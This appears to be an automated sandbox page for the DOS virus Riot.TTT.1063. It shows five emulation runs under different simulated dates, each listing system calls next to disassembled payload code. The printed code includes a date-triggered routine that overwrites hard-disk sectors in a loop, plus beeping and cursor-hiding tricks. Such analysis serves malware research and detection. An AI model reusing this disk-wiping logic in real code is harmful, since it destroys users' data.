Sample viewer

vx.netlux.org/Virus.DOS.Riot.TTT.1063

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:49:02.343154107Z 44 PC: 12d29 | Get time 0x12d29: cmp dl, 0
0x12d2c: jne 0x12d31
0x12d2e: int 5
0x12d30: ret
0x12d31: cmp dl, 1
0x12d34: jne 0x12d55
0x12d36: mov bx, 0x5000
0x12d39: mov es, bx
0x12d3b: mov dx, 0x80
0x12d3e: xor ax, ax
0x12d40: mov cx, 1
0x12d43: int 0x13
0x12d45: mov ax, 0x309
0x12d48: int 0x13
0x12d4a: inc ch
0x12d4c: and ch, 0x40
0x12d4f: jne 0x12d45
0x12d51: inc dh
0x12d53: jmp 0x12d3e
0x12d55: cmp dl, 2
2018-12-17T22:49:02.346077936Z 42 PC: 12d71 | Get date 0x12d71: cmp dl, 2
0x12d74: jne 0x12d83
0x12d76: xor cx, cx
0x12d78: mov ax, 0xe07
0x12d7b: int 0x10
0x12d7d: dec cx
0x12d7e: cmp cx, 0
0x12d81: jne 0x12d78
0x12d83: mov ah, 0x2a
0x12d85: cmp dl, 0x1f
0x12d88: jne 0x12d91
0x12d8a: mov ah, 1
0x12d8c: mov cx, 0x2020
0x12d8f: int 0x10
0x12d91: cmp dx, 0x406
0x12d95: jne 0x12da8
0x12d97: mov ax, 0x301
0x12d9a: mov cx, 1
0x12d9d: mov dx, 0x80
0x12da0: lea bx, word ptr [bp + 0x100]
2018-12-17T22:49:02.349603235Z 26 PC: 12db1 | Set disk transfer address
2018-12-17T22:49:02.351750999Z 25 PC: 12dc2 | Get default drive
2018-12-17T22:49:02.353942144Z 59 PC: 12ebb | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9752,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:42.036698124Z 44 PC: 12d29 | Get time 0x12d29: cmp dl, 0
0x12d2c: jne 0x12d31
0x12d2e: int 5
0x12d30: ret
0x12d31: cmp dl, 1
0x12d34: jne 0x12d55
0x12d36: mov bx, 0x5000
0x12d39: mov es, bx
0x12d3b: mov dx, 0x80
0x12d3e: xor ax, ax
0x12d40: mov cx, 1
0x12d43: int 0x13
0x12d45: mov ax, 0x309
0x12d48: int 0x13
0x12d4a: inc ch
0x12d4c: and ch, 0x40
0x12d4f: jne 0x12d45
0x12d51: inc dh
0x12d53: jmp 0x12d3e
0x12d55: cmp dl, 2
2018-12-25T12:23:42.039863322Z 42 PC: 12d71 | Get date 0x12d71: cmp dl, 2
0x12d74: jne 0x12d83
0x12d76: xor cx, cx
0x12d78: mov ax, 0xe07
0x12d7b: int 0x10
0x12d7d: dec cx
0x12d7e: cmp cx, 0
0x12d81: jne 0x12d78
0x12d83: mov ah, 0x2a
0x12d85: cmp dl, 0x1f
0x12d88: jne 0x12d91
0x12d8a: mov ah, 1
0x12d8c: mov cx, 0x2020
0x12d8f: int 0x10
0x12d91: cmp dx, 0x406
0x12d95: jne 0x12da8
0x12d97: mov ax, 0x301
0x12d9a: mov cx, 1
0x12d9d: mov dx, 0x80
0x12da0: lea bx, word ptr [bp + 0x100]
2018-12-25T12:23:42.041487406Z 26 PC: 12db1 | Set disk transfer address
2018-12-25T12:23:42.042523092Z 25 PC: 12dc2 | Get default drive
2018-12-25T12:23:42.044789165Z 59 PC: 12ebb | Change current directory

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9752,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:42.216389695Z 44 PC: 12d29 | Get time 0x12d29: cmp dl, 0
0x12d2c: jne 0x12d31
0x12d2e: int 5
0x12d30: ret
0x12d31: cmp dl, 1
0x12d34: jne 0x12d55
0x12d36: mov bx, 0x5000
0x12d39: mov es, bx
0x12d3b: mov dx, 0x80
0x12d3e: xor ax, ax
0x12d40: mov cx, 1
0x12d43: int 0x13
0x12d45: mov ax, 0x309
0x12d48: int 0x13
0x12d4a: inc ch
0x12d4c: and ch, 0x40
0x12d4f: jne 0x12d45
0x12d51: inc dh
0x12d53: jmp 0x12d3e
0x12d55: cmp dl, 2
2018-12-25T12:23:42.219253472Z 42 PC: 12d71 | Get date 0x12d71: cmp dl, 2
0x12d74: jne 0x12d83
0x12d76: xor cx, cx
0x12d78: mov ax, 0xe07
0x12d7b: int 0x10
0x12d7d: dec cx
0x12d7e: cmp cx, 0
0x12d81: jne 0x12d78
0x12d83: mov ah, 0x2a
0x12d85: cmp dl, 0x1f
0x12d88: jne 0x12d91
0x12d8a: mov ah, 1
0x12d8c: mov cx, 0x2020
0x12d8f: int 0x10
0x12d91: cmp dx, 0x406
0x12d95: jne 0x12da8
0x12d97: mov ax, 0x301
0x12d9a: mov cx, 1
0x12d9d: mov dx, 0x80
0x12da0: lea bx, word ptr [bp + 0x100]
2018-12-25T12:23:42.324231481Z 26 PC: 12db1 | Set disk transfer address
2018-12-25T12:23:42.32505669Z 25 PC: 12dc2 | Get default drive
2018-12-25T12:23:42.326596327Z 59 PC: 12ebb | Change current directory

{"DateBased":true,"Day":31,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9752,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:42.36904348Z 44 PC: 12d29 | Get time 0x12d29: cmp dl, 0
0x12d2c: jne 0x12d31
0x12d2e: int 5
0x12d30: ret
0x12d31: cmp dl, 1
0x12d34: jne 0x12d55
0x12d36: mov bx, 0x5000
0x12d39: mov es, bx
0x12d3b: mov dx, 0x80
0x12d3e: xor ax, ax
0x12d40: mov cx, 1
0x12d43: int 0x13
0x12d45: mov ax, 0x309
0x12d48: int 0x13
0x12d4a: inc ch
0x12d4c: and ch, 0x40
0x12d4f: jne 0x12d45
0x12d51: inc dh
0x12d53: jmp 0x12d3e
0x12d55: cmp dl, 2
2018-12-25T12:23:42.380085873Z 42 PC: 12d71 | Get date 0x12d71: cmp dl, 2
0x12d74: jne 0x12d83
0x12d76: xor cx, cx
0x12d78: mov ax, 0xe07
0x12d7b: int 0x10
0x12d7d: dec cx
0x12d7e: cmp cx, 0
0x12d81: jne 0x12d78
0x12d83: mov ah, 0x2a
0x12d85: cmp dl, 0x1f
0x12d88: jne 0x12d91
0x12d8a: mov ah, 1
0x12d8c: mov cx, 0x2020
0x12d8f: int 0x10
0x12d91: cmp dx, 0x406
0x12d95: jne 0x12da8
0x12d97: mov ax, 0x301
0x12d9a: mov cx, 1
0x12d9d: mov dx, 0x80
0x12da0: lea bx, word ptr [bp + 0x100]
2018-12-25T12:23:42.382853456Z 26 PC: 12db1 | Set disk transfer address
2018-12-25T12:23:42.38381969Z 25 PC: 12dc2 | Get default drive
2018-12-25T12:23:42.384919808Z 59 PC: 12ebb | Change current directory

{"DateBased":true,"Day":6,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9752,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:42.444031616Z 44 PC: 12d29 | Get time 0x12d29: cmp dl, 0
0x12d2c: jne 0x12d31
0x12d2e: int 5
0x12d30: ret
0x12d31: cmp dl, 1
0x12d34: jne 0x12d55
0x12d36: mov bx, 0x5000
0x12d39: mov es, bx
0x12d3b: mov dx, 0x80
0x12d3e: xor ax, ax
0x12d40: mov cx, 1
0x12d43: int 0x13
0x12d45: mov ax, 0x309
0x12d48: int 0x13
0x12d4a: inc ch
0x12d4c: and ch, 0x40
0x12d4f: jne 0x12d45
0x12d51: inc dh
0x12d53: jmp 0x12d3e
0x12d55: cmp dl, 2
2018-12-25T12:23:42.446986848Z 42 PC: 12d71 | Get date 0x12d71: cmp dl, 2
0x12d74: jne 0x12d83
0x12d76: xor cx, cx
0x12d78: mov ax, 0xe07
0x12d7b: int 0x10
0x12d7d: dec cx
0x12d7e: cmp cx, 0
0x12d81: jne 0x12d78
0x12d83: mov ah, 0x2a
0x12d85: cmp dl, 0x1f
0x12d88: jne 0x12d91
0x12d8a: mov ah, 1
0x12d8c: mov cx, 0x2020
0x12d8f: int 0x10
0x12d91: cmp dx, 0x406
0x12d95: jne 0x12da8
0x12d97: mov ax, 0x301
0x12d9a: mov cx, 1
0x12d9d: mov dx, 0x80
0x12da0: lea bx, word ptr [bp + 0x100]